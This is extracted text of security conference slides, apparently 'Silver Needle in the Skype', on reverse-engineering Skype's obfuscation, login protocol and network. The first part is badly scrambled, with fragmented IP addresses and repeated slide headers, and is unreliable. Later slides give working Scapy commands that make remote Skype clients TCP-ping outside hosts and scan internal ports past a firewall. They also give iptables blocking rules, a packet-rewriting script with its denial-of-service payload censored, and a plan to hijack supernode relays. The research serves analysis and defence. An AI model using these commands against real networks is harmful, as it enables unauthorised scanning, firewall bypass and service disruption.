209:23410 / Skype SoF id=0x7f46 func=0x2 / Skype Enc / Skype Cmd cmd=27L r 172.16.72.161.72.131:2051 > 130.25:33711 / Skype SoF id=0x7f4c func=0x2 / Skype Enc / Skype Cmd cmd=27L req 172.131:2051 / Skype SoF id=0x7f4a func=0x7 / Skype NAck 172.131:2051 > 141.nsummary() 172.131:2051 / Skype SoF id=0x7d64 func=0x2 / Skype Enc / Skype Cmd cmd=28L re 172.131:2051 > 24.16.72.44.168.131:2051 > 218.131:2051 / Skype SoF id=0x7f4e func=0x77 / Skype NAck 172.16.72.16.72.66.72.72.16.213.131:3196 > 85.80.193.117:9238 / Skype SoF id=0x7f48 func=0x63 / Skype Resend 85.113:18812 S 172.72.98.113:18812 / Skype SoF id=0x7f4a func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.131:2051 > 130.168.cap") >>> a[:20].89.131:2051 > 85.131:2051 > 24.89.16.168.113:18812 > 172.89.66.98.168.161.72.117:9238 > 172.16.16.72.66.72.161..16.16./cap/skype up.131:2051 > 24.72.16.98.44.72. Fabrice DESCLAUX Silver Needle in the Skype 57/98 .131:2051 / Skype SoF id=0x7f48 func=0x77 / Skype NAck 172.16.80:8275 > 172.117:9238 / Skype SoF id=0x7f48 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.16.204.80:8275 / Skype SoF id=0x7f4e func=0x23 / Skype Resend Philippe BIONDI.80:8275 / Skype SoF id=0x7f4e func=0x2 / Skype Enc / Skype Cmd cmd=27L reqid 130.161.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> a=rdpcap(".113:18812 > 172.131:2051 > 85.89.16.16.113:18812 / Skype SoF id=0x7f4a func=0x13 / Skype Resend 130.168.44.131:2051 / Skype SoF id=0xbedf func=0x2 / Skype Enc / Skype Cmd cmd=29L re 172.242.72.44.173:37533 / Skype SoF id=0x7f52 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 24.89.72.70.72.117:9238 > 172.57:3655 / Skype SoF id=0x7f50 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 85.92.131:2051 > 212.22.16.

242.16.98.131:2051 > 130.16.72.72..16.113:18812 > 172.25:33711 / Skype SoF id=0x7f4c func=0x2 / Skype Enc / Skype Cmd cmd=27L req 172.72.131:2051 > 85.113:18812 S 172.113:18812 > 172.80.131:3196 > 85.44.89.117:9238 > 172.72.98.89.161.72.89.44.16.70. Fabrice DESCLAUX Silver Needle in the Skype 57/98 .16.72.16.72.44.16.131:2051 / Skype SoF id=0x7f4a func=0x7 / Skype NAck 172.72.131:2051 > 141.213./cap/skype up.16.72.131:2051 > 24.16.16.204.131:2051 > 24.72.16.cap") >>> a[:20].173:37533 / Skype SoF id=0x7f52 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 24.131:2051 / Skype SoF id=0xbedf func=0x2 / Skype Enc / Skype Cmd cmd=29L re 172.113:18812 / Skype SoF id=0x7f4a func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.161.72.16.72.131:2051 / Skype SoF id=0x7d64 func=0x2 / Skype Enc / Skype Cmd cmd=28L re 172.72.66.66.80:8275 / Skype SoF id=0x7f4e func=0x2 / Skype Enc / Skype Cmd cmd=27L reqid 130.16.131:2051 / Skype SoF id=0x7f4e func=0x77 / Skype NAck 172.89.72.89.80:8275 / Skype SoF id=0x7f4e func=0x23 / Skype Resend Philippe BIONDI.131:2051 > 212.161.168.57:3655 / Skype SoF id=0x7f50 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 85.72.117:9238 / Skype SoF id=0x7f48 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.16.168.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> a=rdpcap(".92.66.22.131:2051 > 24.131:2051 > 218.117:9238 / Skype SoF id=0x7f48 func=0x63 / Skype Resend 85.16.209:23410 / Skype SoF id=0x7f46 func=0x2 / Skype Enc / Skype Cmd cmd=27L r 172.16.131:2051 > 130.80:8275 > 172.168.nsummary() 172.193.44.131:2051 / Skype SoF id=0x7f48 func=0x77 / Skype NAck 172.168.161.168.72.117:9238 > 172.98.131:2051 > 85.113:18812 / Skype SoF id=0x7f4a func=0x13 / Skype Resend 130.

25:33711 / Skype SoF id=0x7f4c func=0x2 / Skype Enc / Skype Cmd cmd=27L req 172.113:18812 / Skype SoF id=0x7f4a func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.16.44.66.92.72.16.117:9238 > 172.168.193.80.72. Fabrice DESCLAUX Silver Needle in the Skype 57/98 .66.72.72.131:2051 > 130.72.80:8275 / Skype SoF id=0x7f4e func=0x23 / Skype Resend Philippe BIONDI.113:18812 S 172.131:2051 / Skype SoF id=0xbedf func=0x2 / Skype Enc / Skype Cmd cmd=29L re 172.131:2051 > 24.16.168.72.16.89.16.131:3196 > 85..72.72.89.131:2051 > 212.16.44.89.72.89.117:9238 / Skype SoF id=0x7f48 func=0x63 / Skype Resend 85.113:18812 > 172.72.70.89.98.80:8275 / Skype SoF id=0x7f4e func=0x2 / Skype Enc / Skype Cmd cmd=27L reqid 130.113:18812 > 172.nsummary() 172.168.80:8275 > 172.213.16.16.168.131:2051 / Skype SoF id=0x7d64 func=0x2 / Skype Enc / Skype Cmd cmd=28L re 172./cap/skype up.57:3655 / Skype SoF id=0x7f50 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 85.44.16.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> a=rdpcap(".113:18812 / Skype SoF id=0x7f4a func=0x13 / Skype Resend 130.16.204.16.98.72.66.131:2051 > 85.173:37533 / Skype SoF id=0x7f52 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 24.161.131:2051 > 24.72.168.161.131:2051 > 85.16.131:2051 > 141.16.16.44.117:9238 / Skype SoF id=0x7f48 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.72.117:9238 > 172.161.131:2051 > 130.131:2051 > 218.131:2051 > 24.22.16.72.209:23410 / Skype SoF id=0x7f46 func=0x2 / Skype Enc / Skype Cmd cmd=27L r 172.16.72.131:2051 / Skype SoF id=0x7f4e func=0x77 / Skype NAck 172.72.242.161.131:2051 / Skype SoF id=0x7f4a func=0x7 / Skype NAck 172.98.cap") >>> a[:20].131:2051 / Skype SoF id=0x7f48 func=0x77 / Skype NAck 172.

168.98.98.113:18812 / Skype SoF id=0x7f4a func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.89.131:2051 > 130.16.173:37533 / Skype SoF id=0x7f52 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 24.193.72.16.16.72.66.89.70.161.16.16./cap/skype up.80.113:18812 / Skype SoF id=0x7f4a func=0x13 / Skype Resend 130.161.72.117:9238 > 172.72.44.131:2051 > 24.16.nsummary() 172.72.72.168.117:9238 / Skype SoF id=0x7f48 func=0x63 / Skype Resend 85.16.16.16.113:18812 S 172.131:2051 > 130.16.16.131:2051 > 141.131:2051 > 85.131:2051 / Skype SoF id=0x7f4e func=0x77 / Skype NAck 172.72.131:2051 > 212.72.131:2051 > 24.131:3196 > 85.89.113:18812 > 172.131:2051 > 85.44.113:18812 > 172.89.72.131:2051 > 24..131:2051 / Skype SoF id=0xbedf func=0x2 / Skype Enc / Skype Cmd cmd=29L re 172.72.44.117:9238 / Skype SoF id=0x7f48 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.72.131:2051 / Skype SoF id=0x7d64 func=0x2 / Skype Enc / Skype Cmd cmd=28L re 172.72.168.131:2051 > 218.66.161.72.80:8275 / Skype SoF id=0x7f4e func=0x2 / Skype Enc / Skype Cmd cmd=27L reqid 130.161.22.204.131:2051 / Skype SoF id=0x7f48 func=0x77 / Skype NAck 172.89.57:3655 / Skype SoF id=0x7f50 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 85.80:8275 > 172.cap") >>> a[:20].44.80:8275 / Skype SoF id=0x7f4e func=0x23 / Skype Resend Philippe BIONDI.117:9238 > 172.16.98.242.16.72.209:23410 / Skype SoF id=0x7f46 func=0x2 / Skype Enc / Skype Cmd cmd=27L r 172.25:33711 / Skype SoF id=0x7f4c func=0x2 / Skype Enc / Skype Cmd cmd=27L req 172.16.72.66.16.168.16. Fabrice DESCLAUX Silver Needle in the Skype 57/98 .131:2051 / Skype SoF id=0x7f4a func=0x7 / Skype NAck 172.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> a=rdpcap(".168.92.72.213.

117:9238 > 172.16.16..131:2051 > 141.72.16.72.131:2051 > 218.22.113:18812 S 172.89.72.209:23410 / Skype SoF id=0x7f46 func=0x2 / Skype Enc / Skype Cmd cmd=27L r 172.16.cap") >>> a[:20].98.161.131:2051 / Skype SoF id=0xbedf func=0x2 / Skype Enc / Skype Cmd cmd=29L re 172.161.117:9238 > 172.72.131:2051 / Skype SoF id=0x7f48 func=0x77 / Skype NAck 172.113:18812 > 172.89.113:18812 / Skype SoF id=0x7f4a func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.80:8275 / Skype SoF id=0x7f4e func=0x2 / Skype Enc / Skype Cmd cmd=27L reqid 130.98.16.16.72.89.16.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> a=rdpcap(".131:2051 > 24.72.168.131:2051 > 85.72.117:9238 / Skype SoF id=0x7f48 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 172.161.131:3196 > 85.66.89.204.89.nsummary() 172.66./cap/skype up.80.57:3655 / Skype SoF id=0x7f50 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 85.16.16.193.131:2051 > 85.70. Fabrice DESCLAUX Silver Needle in the Skype 57/98 .98.16.131:2051 > 130.72.16.16.131:2051 > 130.117:9238 / Skype SoF id=0x7f48 func=0x63 / Skype Resend 85.16.131:2051 / Skype SoF id=0x7d64 func=0x2 / Skype Enc / Skype Cmd cmd=28L re 172.131:2051 / Skype SoF id=0x7f4a func=0x7 / Skype NAck 172.131:2051 > 24.72.131:2051 > 24.168.16.113:18812 / Skype SoF id=0x7f4a func=0x13 / Skype Resend 130.72.242.161.16.44.16.168.66.80:8275 / Skype SoF id=0x7f4e func=0x23 / Skype Resend Philippe BIONDI.72.131:2051 / Skype SoF id=0x7f4e func=0x77 / Skype NAck 172.113:18812 > 172.168.72.80:8275 > 172.168.173:37533 / Skype SoF id=0x7f52 func=0x2 / Skype Enc / Skype Cmd cmd=27L re 24.72.25:33711 / Skype SoF id=0x7f4c func=0x2 / Skype Enc / Skype Cmd cmd=27L req 172.213.72.131:2051 > 212.72.44.72.44.44.92.

72.204.70.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> a[0] < Ether dst=00:24:13:21:54:11 src=00:12:39:94:2a:ca type=0x800 |< IP version=4L ihl=5L tos=0x0 len=46 id=0 flags=DF frag=0L ttl=64 proto=UDP chksum=0xa513 src=172.16.209 options=’’ |< UDP sport=2051 dport=23410 len=26 chksum=0x9316 |< Skype SoF id=0x7f46 func=0x2 |< Skype Enc iv=0x93763FBL crc32=0xF28624E6L crypted=’\x9a\x83)\x08K\xc6\xa8’ |< Skype Cmd cmdlen=4L is b0=0L is req=1L is b2=0L cmd=27L reqid=32581 val=< Skype Encod encod=0x42 |< Skype Compressed val=[] |>> |>>>>>> Philippe BIONDI.131 dst=212. Fabrice DESCLAUX Silver Needle in the Skype 58/98 .

psdump(layer_shift=0. Fabrice DESCLAUX Silver Needle in the Skype 59/98 .134.176.86 130.] 7f 48 63 01 83 b0 86 56 82 a1 2c 75 f1 02 f0 88 fe 65 13 2c e1 97 ac Skype SoF id func Skype Resend adet dst src crc reencrypted Philippe BIONDI.161.44.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Example: a Skype startup >>> UDP sport dport len chksum a[6][UDP].5) 08 03 24 16 00 1f 13 cf 2051 9238 31 0x13cf 0x7f48 0x63 0x1 131..117 0xF102F088L ’\xfee\x13..\xe1\x9[.

reqid=RandShort().146.158:4344 >>> sr1(IP(dst="67.146.dport=4344)/Skype SoF( id=RandShort())/Skype Enc()/Skype Cmd(cmd=27.172.158")/UDP(sport=31337. Fabrice DESCLAUX Silver Needle in the Skype 60/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Connection Request a connection to 67. got 1 answers. remaining 0 packets < IP version=4L ihl=5L tos=0x0 len=46 id=48125 flags= frag=0L ttl=107 proto=UDP chksum=0x265 src=67. val=Skype Encod(encod=0x41)/Skype Objects Set(objnb=0))) Begin emission: Finished to send 1 packets.146.15.172.2 options=’’ | < UDP sport=4344 dport=31337 len=26 chksum=0xa04d |< Skype SoF id=0x2f13 func=0x2 | < Skype Enc iv=0x8B3EBE25L crc32=0xAB015175L crypted=’%\xdah\xe3P\xdd\x94’ |< Skype Cmd cmdlen=4L is b0=1L is req=1L is b2=0L cmd=28L reqid=54822 val=< Skype Encod encod=0x42 | < Skype Compressed val=[] |>> |>>>>> Philippe BIONDI.158 dst=172. * Received 1 packets.172.16.

113. < Skype INET ip=83.101.34.197 port=28072 |>].158 dst=172.18 port=48184 |>].dport=4344)/Skype_SoF( id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=6. 201L].I\x96H\xd4=:\x06y \xfb’ |< Skype Cmd cmdlen=69L is b0=1L is req=1L is b2=0L cmd=8L reqid=45233 val=< Skype Encod encod=0x42 |< Skype Compressed val=[[0.146.val=100))) < IP version=4L ihl=5L tos=0x0 len=110 id=56312 flags= frag=0L ttl=107 proto=UDP chksum=0xe229 src=67.73. [2.123. [5.155 port=43794 |>].109 port=1528 |>].239.138 port=29669 |>].167. [2.16.K\xc2\xab\x04\x11\xf2\x1fR\x93lp.225 port=57709 |>].140. < Skype INET ip=140. < Skype INET ip=70. [0. < Skype INET ip=201.118. val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=2) /Skype_Obj_Num(id=0.125 port=62083 |>]. [2. None]] |>> |>>>>> Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Connection Ask for other nodes’ IP >>> sr1(IP(dst="67. < Skype INET ip=213.101. Fabrice DESCLAUX Silver Needle in the Skype 61/98 . [2.246. [2. [2.val=201)/Skype_Obj_Num(id=5. < Skype INET ip=128.172.172.158")/UDP(sport=31337. 9L].6.160 port=33208 |>]. [2.169.235.70. < Skype INET ip=82. < Skype INET ip=134.146.151 port=40793 |>]. [2.15. [2.2 options=’’ | < UDP sport=4344 dport=31337 len=90 chksum=0x485d |< Skype SoF id=0x3c66 func=0x2 | < Skype Enc iv=0x31EB8C94L crc32=0x75012AAFL crypted=’"\xf5\x01~\xd1\xb0(\xa8\x03\xd1\xd9\x8d6\x97\xd6\x9e\xc0\x04< \x99\xf0\x0c\x14\x1d\xd6‘\xe2\xdc\xc0\xc3\x8d\xb4B\xa4\x9f\xd5\xbcK\x96 \xccB\xaa\x17eBt8EA. < Skype INET ip=140.228.134.61. reqid=RandShort().

Fabrice DESCLAUX .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 62/98 Philippe BIONDI.

73df2ea7 Philippe BIONDI. . . . c4aa7b63 . Moduli Two 4096 bits moduli Nine 2048 bits moduli Three 1536 bits moduli RSA moduli example 0xba7463f3.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Trusted data Embedded trusted data In order to recognize Skype authority. 0xc095de9e. Fabrice DESCLAUX Silver Needle in the Skype 63/98 . ... the binary has 13 moduli.

9:33033 212.23:33033 .12:33033 80.48.72.141 :33033 " ecx .. 66.49.160.160.181.91.91.143:33033 Philippe BIONDI.72. eax sub 98A360 Some login server IP/PORT and Supernode IP/PORT 80.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Finding friends Embedded data For the very first connection.160.5 :33033 212 ..235. Fabrice DESCLAUX Silver Needle in the Skype 64/98 .25:33033 64.246.91.49. IP/PORT are stored in the binary Moduli push push push mov call o f f s e t " * Lib / Connection / LoginServers " 45 h o f f s e t " 80 .

Fabrice DESCLAUX Silver Needle in the Skype 65/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Phase 0: Hypothesis Trusted data Each message signed by one of the Skype modulus is trusted The client and the Login server have a shared secret: a hash of the password Philippe BIONDI.

Skype will generate two 512 bits length primes This will give 1024 bits length RSA private/public keys Those keys represent the user for the time of his connection The client generates a symetric session key K Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Phase 1: Key generation Session parameters When a client logs in. Fabrice DESCLAUX Silver Needle in the Skype 66/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Phase 2: Authentication Key exchange The client hashes its login \nskyper\n password with MD5 The client ciphers its public modulus and the resulting hash with K The client encrypts K using RSA with one of the trusted Skype modulus He sends the encrypted session key K and the ciphered data to the login server Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 67/98 .

Fabrice DESCLAUX Silver Needle in the Skype 68/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Phase 2: Authentication Skype modulus Rand 192 bits Login \nskyper\n Password RSA 1536 bits Session key MD5 Hash (SHA160 based) User modulus Shared secret 256 bits key Cipher (AES 256 based) Encrypted session key Encrypted shared secret Philippe BIONDI.

Note that private informations are signed by each user. a supernode will send back this couple You receive the public key of the desired buddy The whole packet is signed by a Skype modulus Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Phase 3: Running Session behavior If the hash of the password matches. Fabrice DESCLAUX Silver Needle in the Skype 69/98 . Search for buddy If you search for a login name. the login associated with the public key is dispatched to the supernodes This information is signed by the Skype server.

Fabrice DESCLAUX Silver Needle in the Skype 70/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Phase 4: Communicating Inter client session Both clients’ public keys are exchanged Those keys are signed by Skype authority Each client sends a 8 bytes challenge to sign Clients are then authenticated and can choose a session key Philippe BIONDI.

Fabrice DESCLAUX .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 71/98 Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Detecting Skype Traffic Some ideas to detect Skype traffic without deobfuscation Most of the traffic is crypted . Fabrice DESCLAUX Silver Needle in the Skype 72/98 . . But not all. UDP communications imply clear traffic to learn the public IP TCP communications use the same RC4 stream twice ! Philippe BIONDI. .

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Detecting Skype Traffic TCP traffic TCP stream begin with a 14 byte long payload From which we can recover 10 bytes of RC4 stream RC4 stream is used twice and we know 10 of the 14 first bytes Seed crypted stream 1 crypted stream 2 known cleartext Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 73/98 .

Fabrice DESCLAUX Silver Needle in the Skype 73/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Detecting Skype Traffic TCP traffic TCP stream begin with a 14 byte long payload From which we can recover 10 bytes of RC4 stream RC4 stream is used twice and we know 10 of the 14 first bytes Seed crypted stream 1 crypted stream 2 RC4 stream (10 bytes) known cleartext Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Detecting Skype Traffic TCP traffic TCP stream begin with a 14 byte long payload From which we can recover 10 bytes of RC4 stream RC4 stream is used twice and we know 10 of the 14 first bytes Seed crypted stream 1 crypted stream 2 Recovered Skype traffic RC4 stream (10 bytes) known cleartext Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 73/98 .

134.72.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Detecting Skype Traffic UDP traffic Skype NAck packet characteristics 28+11=39 byte long packet Function & 0x8f = 7 Bytes 31-34 are (one of) the public IP of the network Skype SoF id func Skype NAck src dst 7f 4e 77 0x7f4e 0x77 82.124.176.51 131. Fabrice DESCLAUX Silver Needle in the Skype 74/98 .86 52 7c 48 33 83 b0 86 56 Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Detecting Skype Traffic Blocking UDP traffic On the use of NAck packets. The very first UDP packet received by a Skype client will be a NAck This packet is not crypted This packet is used to set up the obfuscation layer Skype can’t communicate on UDP without receiving this one How to block Skype UDP traffic with one rule i p t a b l e s −I FORWARD −p udp −m l e n g t h −−l e n g t h 39 −m u32 \ −−u32 ’27&0 x 8 f =7 ’ −−u32 ’31=0 x527c4833 ’ − j DROP Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 75/98 . . .

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Blocking Skype Skype can’t work without a TCP connection But Skype can work without UDP =⇒ Blocking UDP is not sufficient Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 76/98 .

we could detect and replace every NAck by a packet triggering this DoS Philippe BIONDI.... Fabrice DESCLAUX Silver Needle in the Skype 77/98 ..Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Blocking Skype We did not find any command to shutdown Skype But if we had a subtle DoS to crash the communication manager. =⇒ .

. Fabrice DESCLAUX Silver Needle in the Skype 77/98 . we could detect and replace every NAck by a packet triggering this DoS Philippe BIONDI..Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Blocking Skype We did not find any command to shutdown Skype But if we had a subtle DoS to crash the communication manager... =⇒ .

newpkt ) Philippe BIONDI. 2 3 . y . i p l e n . read () p k t = p [PAYLOAD] i h l = ( o r d ( p k t [ 0 ] ) & 0 x f ) << 2 c = c r c 3 2 (2∗∗32 −1 . censored until fixed " q . i p c h k )+ p k t [ 1 2 : i h l +4] \ +pack ( " ! HxII " . Fabrice DESCLAUX Silver Needle in the Skype 78/98 . i p c h k −= 4 newpkt = pack ( " !2 sH6sH " . unpack q = IPQ (IPQ COPY PACKET) while 1: p = q . 2 . NF ACCEPT . c)+" sorry .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands How to make Skype deaf and dumb i p t a b l e s −I FORWARD −p udp −m l e n g t h −−l e n g t h 39 −m u32 \ −−u32 ’27&0 x 8 f =7 ’ −−u32 ’31=0 x01020304 ’ − j QUEUE from i p q u e u e i m p o r t ∗ . i p c h k = unpack ( " !2 sH6sH " . from s t r u c t i m p o r t pack . i p l e n . s e t v e r d i c t ( p [ PACKET ID ] . p k t [ : 1 2 ] ) i p l e n += 4 . y . x . p k t [ 1 5 : 1 1 : − 1 ] + " \ x00 " ∗ 8 ) x .

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands How to generate traffic without the seed to RC4 key engine Source IP Destination IP ID \x00\x00 IV Get the RC4 key for a given seed for once Always use this key to encrypt Calculate the CRC stuff Use IV = seed ⊕ crc CRC32 seed seed to RC4 key engine RC4 key (80 bytes) Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 79/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 80/98 Philippe BIONDI. Fabrice DESCLAUX .

ip="slashdot.1024)))) A look for MS SQL from the inside >>> send(IP(src="1. is_b0=1. is_b0=1. is_req=0.19")/UDP(sport=1234.dst="172. port=1433))) Philippe BIONDI.72.dst="172. val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1) /Skype_Obj_INET(id=0x11.4".72. port=(0.3.16.16.3.72. Fabrice DESCLAUX Silver Needle in the Skype 81/98 .a remote scan) Let’s TCP ping Slashdot >>> send(IP(src="1. ip="172.72.2.16.dport=1146) /Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41. port=80))) A TCP connect scan from the inside >>> send(IP(src="1.dport=1146) /Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41. is_b0=1.19")/UDP(sport=1234.3. is_req=0.k. is_req=0.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Firewall testing (a.*".dst="172.4".19")/UDP(sport=1234.4".2.dport=1146) /Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41. val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1) /Skype_Obj_INET(id=0x11. ip="172.16.org".72.16.2.1". val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1) /Skype_Obj_INET(id=0x11.

35.3776 > 66.4.35.72.250.151.80 > 172.16.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Firewall testing (a.org:80 IP 1.3.72. length: 11 Skype: Hello! (in UDP) IP 172.72.151. Goodbye. length: 20 Skype: connecting to slashdot in TCP IP 172.151. ack 1 Skype: Hello! (in TCP).35.3776: S 0:1(0) ack 0 IP 172. Do you speak Skype ? IP 172.72.35.250.151.80: F 15:15(0) ack 1 IP 66.80: .19.19.3. ack 15 Skype: Mmmh.2.1146 > 1.3776 > 66.3776: .19.19.80: P 1:15(14) ack 1 IP 66.4.35.19.2.19.a remote scan) Me: Say hello to slashdot.250.80 > 172.72.250.3776 > 66.1234: UDP.151.16.16.72. Fabrice DESCLAUX Silver Needle in the Skype 82/98 . master IP 172.1234 > 172. length: 24 Skype: Yes.k.16.72.35.19.250.72.1146 > 66. no.72.3776: F 1:1(0) ack 16 Philippe BIONDI.151.80: UDP.151.35.16. IP 172.35.80: S 0:0(0) IP 66.250.72.19.19.250.16.16.16.1146: UDP.80 > 172.19.16.16.3776 > 66.250.151.

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Skype Network Supernodes Each skype client can relay communications to help unfortunates behind a firewall When a skype client has a good score (bandwidth+no firewall+good cpu) he can be promoted to supernode Slots and blocks Supernodes are grouped by slots You usually find 9 or 10 supernodes by slot You have 8 slots per block Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 83/98 .

158")/UDP(sport=31337.val=201)/Skype_Obj_Num(id=5.172.dport=4344)/Skype_SoF( id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=6.val=100))) Nowadays there are ∼ 2050 slots That means ∼ 20k supernodes in the world Philippe BIONDI.146. reqid=RandShort().Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Who are the supernodes ? Just ask Each supernode knows almost all other supernodes This command actually ask for at most 100 supernodes from slot 201 >>> sr1(IP(dst="67. Fabrice DESCLAUX Silver Needle in the Skype 84/98 . val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=2) /Skype_Obj_Num(id=0.

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Where are the supernodes ? Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 85/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Parallel world: build your own Skype Private Network Skype is linked to the network because it contains: hard-coded RSA keys Skype servers’ IP/PORT Skype Supernodes IP/PORT Make your own network? Generate your own 13 moduli Build a login server with a big database to store users’ passwords And burn a new binary! Job’s done You are the head of a new world wide P2P network Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 86/98 .

. . and feed your own nodes with them Skype network Stolen relay manager Dr Evil network Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Dark network is not enough Dr Evil. Fabrice DESCLAUX Silver Needle in the Skype 87/98 . your network is not wide enough! The use of relay manager is not authenticated Your Supernode can request official network relay managers .

